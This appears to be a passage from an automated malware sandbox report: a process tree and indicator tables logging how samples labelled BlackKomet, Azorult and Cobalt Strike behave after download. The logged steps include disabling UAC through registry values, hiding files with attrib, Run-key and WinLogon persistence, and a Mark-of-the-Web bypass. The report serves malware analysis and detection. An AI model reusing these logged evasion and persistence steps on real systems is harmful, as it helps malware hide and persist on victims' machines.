PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 4988 4736 msedge.exe 82 PID 4736 wrote to memory of 3536 4736 msedge.exe 83 PID 4736 wrote to memory of 3536 4736 msedge.exe 83 PID 4736 wrote to memory of 1516 4736 msedge.exe 84 PID 4736 wrote to memory of 1516 4736 msedge.exe 84 PID 4736 wrote to memory of 1516 4736 msedge.exe 84 PID 4736 wrote to memory of 1516 4736 msedge.exe 84 PID 4736 wrote to memory of 1516 4736 msedge.exe 84 PID 4736 wrote to memory of 1516 4736 msedge.exe 84 PID 4736 wrote to memory of 1516 4736 msedge.exe 84 PID 4736 wrote to memory of 1516 4736 msedge.exe 84 PID 4736 wrote to memory of 1516 4736 msedge.exe 84 PID 4736 wrote to memory of 1516 4736 msedge.exe 84 PID 4736 wrote to memory of 1516 4736 msedge.exe 84 PID 4736 wrote to memory of 1516 4736 msedge.exe 84 PID 4736 wrote to memory of 1516 4736 msedge.exe 84 PID 4736 wrote to memory of 1516 4736 msedge.exe 84 PID 4736 wrote to memory of 1516 4736 msedge.exe 84 PID 4736 wrote to memory of 1516 4736 msedge.exe 84 PID 4736 wrote to memory of 1516 4736 msedge.exe 84 PID 4736 wrote to memory of 1516 4736 msedge.exe 84 PID 4736 wrote to memory of 1516 4736 msedge.exe 84 PID 4736 wrote to memory of 1516 4736 msedge.exe 84 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Azorult.exe -
Views/modifies file attributes 1 TTPs 12 IoCs
pid Process 5384 attrib.exe 2356 attrib.exe 3320 attrib.exe 4320 attrib.exe 1960 attrib.exe 716 attrib.exe 2916 attrib.exe 5736 attrib.exe 2484 attrib.exe 4704 attrib.exe 2880 attrib.exe 5992 attrib.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pornhub.com1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4736 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa16b83cb8,0x7ffa16b83cc8,0x7ffa16b83cd82⤵PID:1556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1896,7779168101013062959,17486908492489599079,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1892 /prefetch:22⤵PID:4988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1896,7779168101013062959,17486908492489599079,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:3536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1896,7779168101013062959,17486908492489599079,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2564 /prefetch:82⤵PID:1516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,7779168101013062959,17486908492489599079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:12⤵PID:3908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,7779168101013062959,17486908492489599079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:12⤵PID:4444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,7779168101013062959,17486908492489599079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:12⤵PID:4636
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1896,7779168101013062959,17486908492489599079,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5852 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1896,7779168101013062959,17486908492489599079,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5848 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,7779168101013062959,17486908492489599079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:12⤵PID:2736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,7779168101013062959,17486908492489599079,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:12⤵PID:1312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,7779168101013062959,17486908492489599079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:12⤵PID:3744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,7779168101013062959,17486908492489599079,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5096 /prefetch:12⤵PID:3164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,7779168101013062959,17486908492489599079,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:12⤵PID:4764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,7779168101013062959,17486908492489599079,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1120 /prefetch:12⤵PID:5036
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1100
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1508
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3152 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa16b83cb8,0x7ffa16b83cc8,0x7ffa16b83cd82⤵PID:1100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1952 /prefetch:22⤵PID:4400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2384 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2608 /prefetch:82⤵PID:4868
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:12⤵PID:4476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:12⤵PID:1924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:12⤵PID:1236
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:12⤵PID:2548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3500 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5344 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:12⤵PID:2112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4288 /prefetch:12⤵PID:496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5320 /prefetch:82⤵PID:4136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5280 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:4448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:12⤵PID:3144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4048 /prefetch:12⤵PID:1948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4116 /prefetch:12⤵PID:4684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:12⤵PID:1612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:12⤵PID:904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4368 /prefetch:12⤵PID:4060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:12⤵PID:2752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6032 /prefetch:12⤵PID:2476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6656 /prefetch:82⤵PID:2704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6692 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:4732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5964 /prefetch:12⤵PID:1720
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4236 /prefetch:12⤵PID:4620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7224 /prefetch:82⤵PID:3464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5376 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:4344
-
-
C:\Users\Admin\Downloads\Blackkomet.exe"C:\Users\Admin\Downloads\Blackkomet.exe"2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4100 -
C:\Windows\SysWOW64\attrib.exeattrib "C:\Users\Admin\Downloads\Blackkomet.exe" +s +h3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4320
-
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Users\Admin\Downloads" +s +h3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2484
-
-
C:\Windows\SysWOW64\Windupdt\winupdate.exe"C:\Windows\system32\Windupdt\winupdate.exe"3⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:1704 -
C:\Windows\SysWOW64\notepad.exenotepad4⤵PID:2116
-
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h4⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
PID:716
-
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Windows\SysWOW64\Windupdt" +s +h4⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
PID:1960
-
-
C:\Windows\SysWOW64\Windupdt\winupdate.exe"C:\Windows\system32\Windupdt\winupdate.exe"4⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4588 -
C:\Windows\SysWOW64\notepad.exenotepad5⤵
- Adds Run key to start application
- Drops file in System32 directory
PID:3700
-
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h5⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
PID:4704
-
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Windows\SysWOW64\Windupdt" +s +h5⤵
- Sets file to hidden
- Drops file in System32 directory
- Views/modifies file attributes
PID:2916
-
-
C:\Windows\SysWOW64\notepad.exeC:\Windows\SysWOW64\notepad.exe5⤵PID:5688
-
-
-
C:\Windows\SysWOW64\notepad.exeC:\Windows\SysWOW64\notepad.exe4⤵
- System Location Discovery: System Language Discovery
PID:4688
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=7228 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:2156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7116 /prefetch:12⤵PID:1512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6040 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:3304
-
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\CobaltStrike.doc" /o ""2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:5036 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe3⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:2716
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6520 /prefetch:12⤵PID:1492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5336 /prefetch:82⤵PID:3412
-
-
